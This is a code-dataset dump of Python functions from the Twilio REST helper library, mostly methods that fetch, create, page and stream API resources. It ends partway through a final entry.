_id
stringlengths
2
7
title
stringlengths
1
88
partition
stringclasses
3 values
text
stringlengths
75
19.8k
language
stringclasses
1 value
meta_information
dict
q29600
StepContextPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a StepContextInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance
    :rtype: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance
    """
    solution = self._solution
    return StepContextInstance(
        self._version,
        payload,
        flow_sid=solution['flow_sid'],
        engagement_sid=solution['engagement_sid'],
        step_sid=solution['step_sid'],
    )
python
{ "resource": "" }
q29601
StepContextContext.fetch
train
def fetch(self):
    """
    Fetch a StepContextInstance from the API.

    :returns: Fetched StepContextInstance
    :rtype: twilio.rest.studio.v1.flow.engagement.step.step_context.StepContextInstance
    """
    # No query parameters are needed for this fetch.
    response = self._version.fetch('GET', self._uri, params=values.of({}))
    solution = self._solution
    return StepContextInstance(
        self._version,
        response,
        flow_sid=solution['flow_sid'],
        engagement_sid=solution['engagement_sid'],
        step_sid=solution['step_sid'],
    )
python
{ "resource": "" }
q29602
format_language
train
def format_language(language):
    """
    Attempt to format the language parameter as 'ww-WW'.

    Accepts a two-letter language code and a two-letter country code joined
    by '-' or '_' (any case) and normalizes it to lowercase-language,
    uppercase-country, e.g. 'en_us' -> 'en-US'.

    :param string language: language parameter; falsy values are returned unchanged
    :returns: the normalized 'ww-WW' string, or the falsy input as-is
    :raises TwiMLException: if the value does not match the expected pattern
    """
    if not language:
        return language
    # re.fullmatch instead of re.match('^...$', ...): '$' also matches just
    # before a trailing newline, so the old check accepted e.g. 'en-US\n'
    # and silently truncated it instead of rejecting it.
    if not re.fullmatch(r'[a-zA-Z]{2}[_-][a-zA-Z]{2}', language):
        raise TwiMLException('Invalid value for language parameter.')
    # Indices 0:2 are the language code, 3:5 the country code; the regex
    # guarantees the separator sits at index 2.
    return language[0:2].lower() + '-' + language[3:5].upper()
python
{ "resource": "" }
q29603
TwiML.to_xml
train
def to_xml(self, xml_declaration=True):
    """
    Serialize this verb's contents to an XML string.

    :param bool xml_declaration: Include the XML declaration. Defaults to True
    """
    body = ET.tostring(self.xml()).decode('utf-8')
    if not xml_declaration:
        return body
    return '<?xml version="1.0" encoding="UTF-8"?>{}'.format(body)
python
{ "resource": "" }
q29604
TodayPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a TodayInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.api.v2010.account.usage.record.today.TodayInstance
    :rtype: twilio.rest.api.v2010.account.usage.record.today.TodayInstance
    """
    account_sid = self._solution['account_sid']
    return TodayInstance(self._version, payload, account_sid=account_sid)
python
{ "resource": "" }
q29605
AssistantFallbackActionsPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into an AssistantFallbackActionsInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsInstance
    :rtype: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsInstance
    """
    assistant_sid = self._solution['assistant_sid']
    return AssistantFallbackActionsInstance(
        self._version,
        payload,
        assistant_sid=assistant_sid,
    )
python
{ "resource": "" }
q29606
NewSigningKeyPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a NewSigningKeyInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.api.v2010.account.new_signing_key.NewSigningKeyInstance
    :rtype: twilio.rest.api.v2010.account.new_signing_key.NewSigningKeyInstance
    """
    account_sid = self._solution['account_sid']
    return NewSigningKeyInstance(self._version, payload, account_sid=account_sid)
python
{ "resource": "" }
q29607
ConnectAppList.get
train
def get(self, sid):
    """
    Construct a ConnectAppContext for the given SID.

    :param sid: The unique string that identifies the resource

    :returns: twilio.rest.api.v2010.account.connect_app.ConnectAppContext
    :rtype: twilio.rest.api.v2010.account.connect_app.ConnectAppContext
    """
    return ConnectAppContext(
        self._version,
        account_sid=self._solution['account_sid'],
        sid=sid,
    )
python
{ "resource": "" }
q29608
ConnectAppPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a ConnectAppInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.api.v2010.account.connect_app.ConnectAppInstance
    :rtype: twilio.rest.api.v2010.account.connect_app.ConnectAppInstance
    """
    account_sid = self._solution['account_sid']
    return ConnectAppInstance(self._version, payload, account_sid=account_sid)
python
{ "resource": "" }
q29609
FieldValueList.create
train
def create(self, language, value, synonym_of=values.unset):
    """
    Create a new FieldValueInstance via the API.

    :param unicode language: The ISO language-country tag that identifies the language of the value
    :param unicode value: The Field Value data
    :param unicode synonym_of: The string value that indicates which word the field value is a synonym of

    :returns: Newly created FieldValueInstance
    :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance
    """
    form = values.of({
        'Language': language,
        'Value': value,
        'SynonymOf': synonym_of,
    })
    created = self._version.create('POST', self._uri, data=form)
    solution = self._solution
    return FieldValueInstance(
        self._version,
        created,
        assistant_sid=solution['assistant_sid'],
        field_type_sid=solution['field_type_sid'],
    )
python
{ "resource": "" }
q29610
FieldValueList.get
train
def get(self, sid):
    """
    Construct a FieldValueContext for the given SID.

    :param sid: The unique string that identifies the resource

    :returns: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueContext
    :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueContext
    """
    solution = self._solution
    return FieldValueContext(
        self._version,
        assistant_sid=solution['assistant_sid'],
        field_type_sid=solution['field_type_sid'],
        sid=sid,
    )
python
{ "resource": "" }
q29611
FieldValuePage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a FieldValueInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance
    :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance
    """
    solution = self._solution
    return FieldValueInstance(
        self._version,
        payload,
        assistant_sid=solution['assistant_sid'],
        field_type_sid=solution['field_type_sid'],
    )
python
{ "resource": "" }
q29612
FieldValueContext.fetch
train
def fetch(self):
    """
    Fetch a FieldValueInstance from the API.

    :returns: Fetched FieldValueInstance
    :rtype: twilio.rest.autopilot.v1.assistant.field_type.field_value.FieldValueInstance
    """
    # No query parameters are needed for this fetch.
    response = self._version.fetch('GET', self._uri, params=values.of({}))
    solution = self._solution
    return FieldValueInstance(
        self._version,
        response,
        assistant_sid=solution['assistant_sid'],
        field_type_sid=solution['field_type_sid'],
        sid=solution['sid'],
    )
python
{ "resource": "" }
q29613
RatePlanList.create
train
def create(self, unique_name=values.unset, friendly_name=values.unset,
           data_enabled=values.unset, data_limit=values.unset,
           data_metering=values.unset, messaging_enabled=values.unset,
           voice_enabled=values.unset, national_roaming_enabled=values.unset,
           international_roaming=values.unset,
           national_roaming_data_limit=values.unset,
           international_roaming_data_limit=values.unset):
    """
    Create a new RatePlanInstance.

    :param unicode unique_name: A user-provided string that uniquely identifies this resource as an alternative to the Sid.
    :param unicode friendly_name: A user-provided string that identifies this resource.
    :param bool data_enabled: Defines whether SIMs are capable of using GPRS/3G/LTE data connectivity.
    :param unicode data_limit: Network-enforced limit specifying the total Megabytes of data usage allowed during one month on the home network.
    :param unicode data_metering: The model by which to meter data usage, in accordance with the two available data metering models.
    :param bool messaging_enabled: Defines whether SIMs are capable of making and sending and receiving SMS messages via either Commands or Programmable SMS APIs.
    :param bool voice_enabled: Defines whether SIMs are capable of making and receiving voice calls.
    :param bool national_roaming_enabled: Defines whether SIMs can roam onto other networks in the SIM's home country.
    :param unicode international_roaming: The international_roaming
    :param unicode national_roaming_data_limit: Network-enforced limit specifying the total Megabytes of national roaming data usage allowed during one month.
    :param unicode international_roaming_data_limit: The international_roaming_data_limit

    :returns: Newly created RatePlanInstance
    :rtype: twilio.rest.wireless.v1.rate_plan.RatePlanInstance
    """
    # Map the Python keyword arguments onto the API's CamelCase form fields.
    data = values.of({
        'UniqueName': unique_name,
        'FriendlyName': friendly_name,
        'DataEnabled': data_enabled,
        'DataLimit': data_limit,
        'DataMetering': data_metering,
        'MessagingEnabled': messaging_enabled,
        'VoiceEnabled': voice_enabled,
        'NationalRoamingEnabled': national_roaming_enabled,
        # international_roaming is list-valued; serialize.map expands it
        # element-wise (identity transform) for the form encoding.
        'InternationalRoaming': serialize.map(international_roaming, lambda e: e),
        'NationalRoamingDataLimit': national_roaming_data_limit,
        'InternationalRoamingDataLimit': international_roaming_data_limit,
    })

    payload = self._version.create(
        'POST',
        self._uri,
        data=data,
    )

    return RatePlanInstance(self._version, payload, )
python
{ "resource": "" }
q29614
ReservationContext.fetch
train
def fetch(self):
    """
    Fetch a ReservationInstance from the API.

    :returns: Fetched ReservationInstance
    :rtype: twilio.rest.taskrouter.v1.workspace.task.reservation.ReservationInstance
    """
    # No query parameters are needed for this fetch.
    response = self._version.fetch('GET', self._uri, params=values.of({}))
    solution = self._solution
    return ReservationInstance(
        self._version,
        response,
        workspace_sid=solution['workspace_sid'],
        task_sid=solution['task_sid'],
        sid=solution['sid'],
    )
python
{ "resource": "" }
q29615
AlertList.page
train
def page(self, log_level=values.unset, start_date=values.unset,
         end_date=values.unset, page_token=values.unset,
         page_number=values.unset, page_size=values.unset):
    """
    Retrieve a single page of AlertInstance records from the API.
    The request is executed immediately.

    :param unicode log_level: Only show alerts for this log-level.
    :param date start_date: Only show Alerts on or after this date.
    :param date end_date: Only show Alerts on or before this date.
    :param str page_token: PageToken provided by the API
    :param int page_number: Page Number, this value is simply for client state
    :param int page_size: Number of records to return, defaults to 50

    :returns: Page of AlertInstance
    :rtype: twilio.rest.monitor.v1.alert.AlertPage
    """
    query = values.of({
        'LogLevel': log_level,
        # Dates are sent to the API in ISO-8601 form.
        'StartDate': serialize.iso8601_date(start_date),
        'EndDate': serialize.iso8601_date(end_date),
        'PageToken': page_token,
        'Page': page_number,
        'PageSize': page_size,
    })
    response = self._version.page('GET', self._uri, params=query)
    return AlertPage(self._version, response, self._solution)
python
{ "resource": "" }
q29616
PublicKeyList.create
train
def create(self, public_key, friendly_name=values.unset,
           account_sid=values.unset):
    """
    Create a new PublicKeyInstance via the API.

    :param unicode public_key: A URL encoded representation of the public key
    :param unicode friendly_name: A string to describe the resource
    :param unicode account_sid: The Subaccount this Credential should be associated with.

    :returns: Newly created PublicKeyInstance
    :rtype: twilio.rest.accounts.v1.credential.public_key.PublicKeyInstance
    """
    form = values.of({
        'PublicKey': public_key,
        'FriendlyName': friendly_name,
        'AccountSid': account_sid,
    })
    created = self._version.create('POST', self._uri, data=form)
    return PublicKeyInstance(self._version, created, )
python
{ "resource": "" }
q29617
TollFreePage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a TollFreeInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.api.v2010.account.available_phone_number.toll_free.TollFreeInstance
    :rtype: twilio.rest.api.v2010.account.available_phone_number.toll_free.TollFreeInstance
    """
    solution = self._solution
    return TollFreeInstance(
        self._version,
        payload,
        account_sid=solution['account_sid'],
        country_code=solution['country_code'],
    )
python
{ "resource": "" }
q29618
TaskList.stream
train
def stream(self, priority=values.unset, assignment_status=values.unset,
           workflow_sid=values.unset, workflow_name=values.unset,
           task_queue_sid=values.unset, task_queue_name=values.unset,
           evaluate_task_attributes=values.unset, ordering=values.unset,
           has_addons=values.unset, limit=None, page_size=None):
    """
    Streams TaskInstance records from the API as a generator stream.
    This operation lazily loads records as efficiently as possible until the
    limit is reached. The results are returned as a generator, so this
    operation is memory efficient.

    :param unicode priority: Retrieve the list of all Tasks in the workspace with the specified priority.
    :param unicode assignment_status: Returns the list of all Tasks in the workspace with the specified AssignmentStatus.
    :param unicode workflow_sid: Returns the list of Tasks that are being controlled by the Workflow with the specified Sid value.
    :param unicode workflow_name: Returns the list of Tasks that are being controlled by the Workflow with the specified FriendlyName value.
    :param unicode task_queue_sid: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the Sid specified.
    :param unicode task_queue_name: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the FriendlyName specified.
    :param unicode evaluate_task_attributes: Provide a task attributes expression, and this will return tasks which match the attributes.
    :param unicode ordering: Use this parameter to control the order of the Tasks returned.
    :param bool has_addons: The has_addons
    :param int limit: Upper limit for the number of records to return. stream()
                      guarantees to never return more than limit. Default is no limit
    :param int page_size: Number of records to fetch per request, when not set will use
                          the default value of 50 records. If no page_size is defined
                          but a limit is defined, stream() will attempt to read the
                          limit with the most efficient page size, i.e. min(limit, 1000)

    :returns: Generator that will yield up to limit results
    :rtype: list[twilio.rest.taskrouter.v1.workspace.task.TaskInstance]
    """
    # Resolve the effective per-page size and overall limits from the
    # caller-supplied limit/page_size pair.
    limits = self._version.read_limits(limit, page_size)

    # Fetch the first page eagerly; subsequent pages are loaded lazily by
    # self._version.stream as the generator is consumed.
    page = self.page(
        priority=priority,
        assignment_status=assignment_status,
        workflow_sid=workflow_sid,
        workflow_name=workflow_name,
        task_queue_sid=task_queue_sid,
        task_queue_name=task_queue_name,
        evaluate_task_attributes=evaluate_task_attributes,
        ordering=ordering,
        has_addons=has_addons,
        page_size=limits['page_size'],
    )

    return self._version.stream(page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29619
TaskList.page
train
def page(self, priority=values.unset, assignment_status=values.unset,
         workflow_sid=values.unset, workflow_name=values.unset,
         task_queue_sid=values.unset, task_queue_name=values.unset,
         evaluate_task_attributes=values.unset, ordering=values.unset,
         has_addons=values.unset, page_token=values.unset,
         page_number=values.unset, page_size=values.unset):
    """
    Retrieve a single page of TaskInstance records from the API.
    Request is executed immediately

    :param unicode priority: Retrieve the list of all Tasks in the workspace with the specified priority.
    :param unicode assignment_status: Returns the list of all Tasks in the workspace with the specified AssignmentStatus.
    :param unicode workflow_sid: Returns the list of Tasks that are being controlled by the Workflow with the specified Sid value.
    :param unicode workflow_name: Returns the list of Tasks that are being controlled by the Workflow with the specified FriendlyName value.
    :param unicode task_queue_sid: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the Sid specified.
    :param unicode task_queue_name: Returns the list of Tasks that are currently waiting in the TaskQueue identified by the FriendlyName specified.
    :param unicode evaluate_task_attributes: Provide a task attributes expression, and this will return tasks which match the attributes.
    :param unicode ordering: Use this parameter to control the order of the Tasks returned.
    :param bool has_addons: The has_addons
    :param str page_token: PageToken provided by the API
    :param int page_number: Page Number, this value is simply for client state
    :param int page_size: Number of records to return, defaults to 50

    :returns: Page of TaskInstance
    :rtype: twilio.rest.taskrouter.v1.workspace.task.TaskPage
    """
    # Map the Python keyword arguments onto the API's CamelCase query params.
    params = values.of({
        'Priority': priority,
        # assignment_status is list-valued; serialize.map expands it
        # element-wise (identity transform) for the query encoding.
        'AssignmentStatus': serialize.map(assignment_status, lambda e: e),
        'WorkflowSid': workflow_sid,
        'WorkflowName': workflow_name,
        'TaskQueueSid': task_queue_sid,
        'TaskQueueName': task_queue_name,
        'EvaluateTaskAttributes': evaluate_task_attributes,
        'Ordering': ordering,
        'HasAddons': has_addons,
        'PageToken': page_token,
        'Page': page_number,
        'PageSize': page_size,
    })

    response = self._version.page(
        'GET',
        self._uri,
        params=params,
    )

    return TaskPage(self._version, response, self._solution)
python
{ "resource": "" }
q29620
StreamMessageList.create
train
def create(self, data):
    """
    Create a new StreamMessageInstance via the API.

    :param dict data: Stream Message body.

    :returns: Newly created StreamMessageInstance
    :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
    """
    # Keep the serialized form separate from the `data` argument for clarity.
    form = values.of({'Data': serialize.object(data), })
    created = self._version.create('POST', self._uri, data=form)
    solution = self._solution
    return StreamMessageInstance(
        self._version,
        created,
        service_sid=solution['service_sid'],
        stream_sid=solution['stream_sid'],
    )
python
{ "resource": "" }
q29621
StreamMessagePage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into a StreamMessageInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
    :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
    """
    solution = self._solution
    return StreamMessageInstance(
        self._version,
        payload,
        service_sid=solution['service_sid'],
        stream_sid=solution['stream_sid'],
    )
python
{ "resource": "" }
q29622
EnvironmentList.create
train
def create(self, unique_name, domain_suffix=values.unset):
    """
    Create a new EnvironmentInstance via the API.

    :param unicode unique_name: The unique_name
    :param unicode domain_suffix: The domain_suffix

    :returns: Newly created EnvironmentInstance
    :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentInstance
    """
    form = values.of({
        'UniqueName': unique_name,
        'DomainSuffix': domain_suffix,
    })
    created = self._version.create('POST', self._uri, data=form)
    service_sid = self._solution['service_sid']
    return EnvironmentInstance(self._version, created, service_sid=service_sid)
python
{ "resource": "" }
q29623
EnvironmentList.get
train
def get(self, sid):
    """
    Construct an EnvironmentContext for the given SID.

    :param sid: The sid

    :returns: twilio.rest.serverless.v1.service.environment.EnvironmentContext
    :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentContext
    """
    return EnvironmentContext(
        self._version,
        service_sid=self._solution['service_sid'],
        sid=sid,
    )
python
{ "resource": "" }
q29624
EnvironmentPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into an EnvironmentInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.serverless.v1.service.environment.EnvironmentInstance
    :rtype: twilio.rest.serverless.v1.service.environment.EnvironmentInstance
    """
    service_sid = self._solution['service_sid']
    return EnvironmentInstance(self._version, payload, service_sid=service_sid)
python
{ "resource": "" }
q29625
EnvironmentContext.variables
train
def variables(self):
    """
    Access the variables subresource, building the list lazily on first use.

    :returns: twilio.rest.serverless.v1.service.environment.variable.VariableList
    :rtype: twilio.rest.serverless.v1.service.environment.variable.VariableList
    """
    if self._variables is None:
        solution = self._solution
        self._variables = VariableList(
            self._version,
            service_sid=solution['service_sid'],
            environment_sid=solution['sid'],
        )
    return self._variables
python
{ "resource": "" }
q29626
ExecutionList.stream
train
def stream(self, date_created_from=values.unset,
           date_created_to=values.unset, limit=None, page_size=None):
    """
    Stream ExecutionInstance records from the API as a generator.
    Records are loaded lazily, page by page, until the limit is reached,
    so the operation is memory efficient.

    :param datetime date_created_from: Only show Executions that started on or after this ISO8601 date-time.
    :param datetime date_created_to: Only show Executions that started before this this ISO8601 date-time.
    :param int limit: Upper limit for the number of records to return. stream()
                      guarantees to never return more than limit. Default is no limit
    :param int page_size: Number of records to fetch per request, when not set will use
                          the default value of 50 records. If no page_size is defined
                          but a limit is defined, stream() will attempt to read the
                          limit with the most efficient page size, i.e. min(limit, 1000)

    :returns: Generator that will yield up to limit results
    :rtype: list[twilio.rest.studio.v1.flow.execution.ExecutionInstance]
    """
    limits = self._version.read_limits(limit, page_size)
    first_page = self.page(
        date_created_from=date_created_from,
        date_created_to=date_created_to,
        page_size=limits['page_size'],
    )
    return self._version.stream(first_page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29627
ExecutionList.page
train
def page(self, date_created_from=values.unset, date_created_to=values.unset,
         page_token=values.unset, page_number=values.unset,
         page_size=values.unset):
    """
    Retrieve a single page of ExecutionInstance records from the API.
    The request is executed immediately.

    :param datetime date_created_from: Only show Executions that started on or after this ISO8601 date-time.
    :param datetime date_created_to: Only show Executions that started before this this ISO8601 date-time.
    :param str page_token: PageToken provided by the API
    :param int page_number: Page Number, this value is simply for client state
    :param int page_size: Number of records to return, defaults to 50

    :returns: Page of ExecutionInstance
    :rtype: twilio.rest.studio.v1.flow.execution.ExecutionPage
    """
    query = values.of({
        # Datetimes are sent to the API in ISO-8601 form.
        'DateCreatedFrom': serialize.iso8601_datetime(date_created_from),
        'DateCreatedTo': serialize.iso8601_datetime(date_created_to),
        'PageToken': page_token,
        'Page': page_number,
        'PageSize': page_size,
    })
    response = self._version.page('GET', self._uri, params=query)
    return ExecutionPage(self._version, response, self._solution)
python
{ "resource": "" }
q29628
ExecutionList.create
train
def create(self, to, from_, parameters=values.unset):
    """
    Create a new ExecutionInstance via the API.

    :param unicode to: The Contact phone number to start a Studio Flow Execution.
    :param unicode from_: The Twilio phone number to send messages or initiate calls from during the Flow Execution.
    :param dict parameters: JSON data that will be added to your flow's context and can accessed as variables inside your flow.

    :returns: Newly created ExecutionInstance
    :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance
    """
    form = values.of({
        'To': to,
        'From': from_,
        'Parameters': serialize.object(parameters),
    })
    created = self._version.create('POST', self._uri, data=form)
    flow_sid = self._solution['flow_sid']
    return ExecutionInstance(self._version, created, flow_sid=flow_sid)
python
{ "resource": "" }
q29629
ExecutionList.get
train
def get(self, sid):
    """
    Construct an ExecutionContext for the given SID.

    :param sid: Execution Sid.

    :returns: twilio.rest.studio.v1.flow.execution.ExecutionContext
    :rtype: twilio.rest.studio.v1.flow.execution.ExecutionContext
    """
    return ExecutionContext(
        self._version,
        flow_sid=self._solution['flow_sid'],
        sid=sid,
    )
python
{ "resource": "" }
q29630
ExecutionPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into an ExecutionInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.studio.v1.flow.execution.ExecutionInstance
    :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance
    """
    flow_sid = self._solution['flow_sid']
    return ExecutionInstance(self._version, payload, flow_sid=flow_sid)
python
{ "resource": "" }
q29631
ExecutionContext.fetch
train
def fetch(self):
    """
    Fetch an ExecutionInstance from the API.

    :returns: Fetched ExecutionInstance
    :rtype: twilio.rest.studio.v1.flow.execution.ExecutionInstance
    """
    # No query parameters are needed for this fetch.
    response = self._version.fetch('GET', self._uri, params=values.of({}))
    solution = self._solution
    return ExecutionInstance(
        self._version,
        response,
        flow_sid=solution['flow_sid'],
        sid=solution['sid'],
    )
python
{ "resource": "" }
q29632
ExecutionContext.execution_context
train
def execution_context(self):
    """
    Access the execution_context subresource, building the list lazily on
    first use.

    :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextList
    :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextList
    """
    if self._execution_context is None:
        solution = self._solution
        self._execution_context = ExecutionContextList(
            self._version,
            flow_sid=solution['flow_sid'],
            execution_sid=solution['sid'],
        )
    return self._execution_context
python
{ "resource": "" }
q29633
ExecutionContextList.get
train
def get(self):
    """
    Construct an ExecutionContextContext.

    :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextContext
    :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextContext
    """
    solution = self._solution
    return ExecutionContextContext(
        self._version,
        flow_sid=solution['flow_sid'],
        execution_sid=solution['execution_sid'],
    )
python
{ "resource": "" }
q29634
ExecutionContextPage.get_instance
train
def get_instance(self, payload):
    """
    Turn an API response payload into an ExecutionContextInstance.

    :param dict payload: Payload response from the API

    :returns: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance
    :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance
    """
    solution = self._solution
    return ExecutionContextInstance(
        self._version,
        payload,
        flow_sid=solution['flow_sid'],
        execution_sid=solution['execution_sid'],
    )
python
{ "resource": "" }
q29635
ExecutionContextContext.fetch
train
def fetch(self):
    """
    Fetch an ExecutionContextInstance from the API.

    :returns: Fetched ExecutionContextInstance
    :rtype: twilio.rest.studio.v1.flow.execution.execution_context.ExecutionContextInstance
    """
    # No query parameters are needed for this fetch.
    response = self._version.fetch('GET', self._uri, params=values.of({}))
    solution = self._solution
    return ExecutionContextInstance(
        self._version,
        response,
        flow_sid=solution['flow_sid'],
        execution_sid=solution['execution_sid'],
    )
python
{ "resource": "" }
q29636
WebhookList.create
train
def create(self, target, configuration_url=values.unset,
           configuration_method=values.unset,
           configuration_filters=values.unset,
           configuration_triggers=values.unset,
           configuration_flow_sid=values.unset,
           configuration_retry_count=values.unset,
           configuration_replay_after=values.unset,
           configuration_buffer_messages=values.unset,
           configuration_buffer_window=values.unset):
    """
    Create a new WebhookInstance.

    :param WebhookInstance.Target target: The target of this webhook.
    :param unicode configuration_url: The absolute url the webhook request should be sent to.
    :param WebhookInstance.Method configuration_method: The HTTP method to be used when sending a webhook request.
    :param unicode configuration_filters: The list of events, firing webhook event for this Session.
    :param unicode configuration_triggers: The list of keywords, firing webhook event for this Session.
    :param unicode configuration_flow_sid: The studio flow sid, where the webhook should be sent to.
    :param unicode configuration_retry_count: The number of retries in case of webhook request failures.
    :param unicode configuration_replay_after: The message index for which and it's successors the webhook will be replayed.
    :param bool configuration_buffer_messages: The flag whether buffering should be applied to messages.
    :param unicode configuration_buffer_window: The period of buffering messages.

    :returns: Newly created WebhookInstance
    :rtype: twilio.rest.messaging.v1.session.webhook.WebhookInstance
    """
    # Map the Python keyword arguments onto the API's dotted
    # 'Configuration.*' form fields.
    data = values.of({
        'Target': target,
        'Configuration.Url': configuration_url,
        'Configuration.Method': configuration_method,
        # filters/triggers are list-valued; serialize.map expands them
        # element-wise (identity transform) for the form encoding.
        'Configuration.Filters': serialize.map(configuration_filters, lambda e: e),
        'Configuration.Triggers': serialize.map(configuration_triggers, lambda e: e),
        'Configuration.FlowSid': configuration_flow_sid,
        'Configuration.RetryCount': configuration_retry_count,
        'Configuration.ReplayAfter': configuration_replay_after,
        'Configuration.BufferMessages': configuration_buffer_messages,
        'Configuration.BufferWindow': configuration_buffer_window,
    })

    payload = self._version.create(
        'POST',
        self._uri,
        data=data,
    )

    return WebhookInstance(self._version, payload, session_sid=self._solution['session_sid'], )
python
{ "resource": "" }
q29637
SharedCostList.page
train
def page(self, area_code=values.unset, contains=values.unset,
         sms_enabled=values.unset, mms_enabled=values.unset,
         voice_enabled=values.unset, exclude_all_address_required=values.unset,
         exclude_local_address_required=values.unset,
         exclude_foreign_address_required=values.unset, beta=values.unset,
         near_number=values.unset, near_lat_long=values.unset,
         distance=values.unset, in_postal_code=values.unset,
         in_region=values.unset, in_rate_center=values.unset,
         in_lata=values.unset, in_locality=values.unset,
         fax_enabled=values.unset, page_token=values.unset,
         page_number=values.unset, page_size=values.unset):
    """
    Retrieve a single page of SharedCostInstance records from the API.
    The request is executed immediately.

    :param unicode area_code: The area code of the phone numbers to read
    :param unicode contains: The pattern on which to match phone numbers
    :param bool sms_enabled: Whether the phone numbers can receive text messages
    :param bool mms_enabled: Whether the phone numbers can receive MMS messages
    :param bool voice_enabled: Whether the phone numbers can receive calls.
    :param bool exclude_all_address_required: Whether to exclude phone numbers that require an Address
    :param bool exclude_local_address_required: Whether to exclude phone numbers that require a local address
    :param bool exclude_foreign_address_required: Whether to exclude phone numbers that require a foreign address
    :param bool beta: Whether to read phone numbers new to the Twilio platform
    :param unicode near_number: Given a phone number, find a geographically close number within distance miles. (US/Canada only)
    :param unicode near_lat_long: Given a latitude/longitude pair lat,long find geographically close numbers within distance miles. (US/Canada only)
    :param unicode distance: The search radius, in miles, for a near_ query. (US/Canada only)
    :param unicode in_postal_code: Limit results to a particular postal code. (US/Canada only)
    :param unicode in_region: Limit results to a particular region. (US/Canada only)
    :param unicode in_rate_center: Limit results to a specific rate center, or given a phone number search within the same rate center as that number. (US/Canada only)
    :param unicode in_lata: Limit results to a specific local access and transport area. (US/Canada only)
    :param unicode in_locality: Limit results to a particular locality
    :param bool fax_enabled: Whether the phone numbers can receive faxes
    :param str page_token: PageToken provided by the API
    :param int page_number: Page Number, this value is simply for client state
    :param int page_size: Number of records to return, defaults to 50

    :returns: Page of SharedCostInstance
    :rtype: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostPage
    """
    # Unset filters are dropped by values.of(), so only explicit filters
    # are sent as query parameters.
    query = values.of({
        'AreaCode': area_code,
        'Contains': contains,
        'SmsEnabled': sms_enabled,
        'MmsEnabled': mms_enabled,
        'VoiceEnabled': voice_enabled,
        'ExcludeAllAddressRequired': exclude_all_address_required,
        'ExcludeLocalAddressRequired': exclude_local_address_required,
        'ExcludeForeignAddressRequired': exclude_foreign_address_required,
        'Beta': beta,
        'NearNumber': near_number,
        'NearLatLong': near_lat_long,
        'Distance': distance,
        'InPostalCode': in_postal_code,
        'InRegion': in_region,
        'InRateCenter': in_rate_center,
        'InLata': in_lata,
        'InLocality': in_locality,
        'FaxEnabled': fax_enabled,
        'PageToken': page_token,
        'Page': page_number,
        'PageSize': page_size,
    })

    page_response = self._version.page('GET', self._uri, params=query)

    return SharedCostPage(self._version, page_response, self._solution)
python
{ "resource": "" }
q29638
SharedCostPage.get_instance
train
def get_instance(self, payload): """ Build an instance of SharedCostInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostInstance :rtype: twilio.rest.api.v2010.account.available_phone_number.shared_cost.SharedCostInstance """ return SharedCostInstance( self._version, payload, account_sid=self._solution['account_sid'], country_code=self._solution['country_code'], )
python
{ "resource": "" }
q29639
IpAccessControlListContext.ip_addresses
train
def ip_addresses(self): """ Access the ip_addresses :returns: twilio.rest.api.v2010.account.sip.ip_access_control_list.ip_address.IpAddressList :rtype: twilio.rest.api.v2010.account.sip.ip_access_control_list.ip_address.IpAddressList """ if self._ip_addresses is None: self._ip_addresses = IpAddressList( self._version, account_sid=self._solution['account_sid'], ip_access_control_list_sid=self._solution['sid'], ) return self._ip_addresses
python
{ "resource": "" }
q29640
AssistantContext.assistant_fallback_actions
train
